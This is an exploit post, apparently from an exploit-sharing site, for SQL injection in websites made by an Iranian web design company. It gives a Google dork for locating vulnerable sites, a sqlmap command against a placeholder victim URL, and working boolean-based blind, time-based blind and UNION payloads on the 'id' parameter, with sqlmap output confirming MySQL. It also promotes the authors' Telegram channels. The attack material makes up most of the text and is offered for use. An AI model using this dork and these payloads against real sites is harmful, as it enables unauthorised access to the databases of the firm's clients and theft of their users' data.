#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
# Exploit Title: [SQL Injection]
# Google Dork: [inurl:php?id= intext:طراحی وب سایت : ایران تکنولوژی]
# Software Link: http://sqlmap.org/
# Dork CVE: N/A
# Date: [2020-05-24]
# Exploit Author: [Aryan Chehreghani | Ictus_TM]
# Team Channel : T.me/Ictus_TM
# Version: All Version
# Tested on: [Linux / Windows / ....]
______________________________________________________________________________________

SQLMAP :

[-] sqlmap -u "http://victim.com/fa/user/temp.php?pavc_njol=specific&id=87" --dbs
______________________________________________________________________________________

Testing :

Generic UNION query (NULL)
MySQL >= 5.0.12 AND time-based blind (query SLEEP)

[#] Testing Method:

[+] - boolean-based blind
[+] - time-based blind
______________________________________________________________________________________

|||||||||||||||||||||||
Parameter: sec (GET) ||
|||||||||||||||||||||||

EX Payload :

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: irantech_parvaz=specific&id=87' AND 4752=4752 AND 'qNzU'='qNzU

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: irantech_parvaz=specific&id=87' AND (SELECT 7431 FROM (SELECT(SLEEP(5)))QoYj) AND 'irYH'='irYH

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: irantech_parvaz=specific&id=-6437' UNION ALL SELECT NULL,NULL,CONCAT(0x71716b6b71,0x4c70465956435372566e62444e59784e476a416c6951684d4375484c4754566365796f4747777a79,0x71766b7071)-- -
---
[05:49:06] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
____________________________________________________________________________________

[=] T.me/Clvsornapv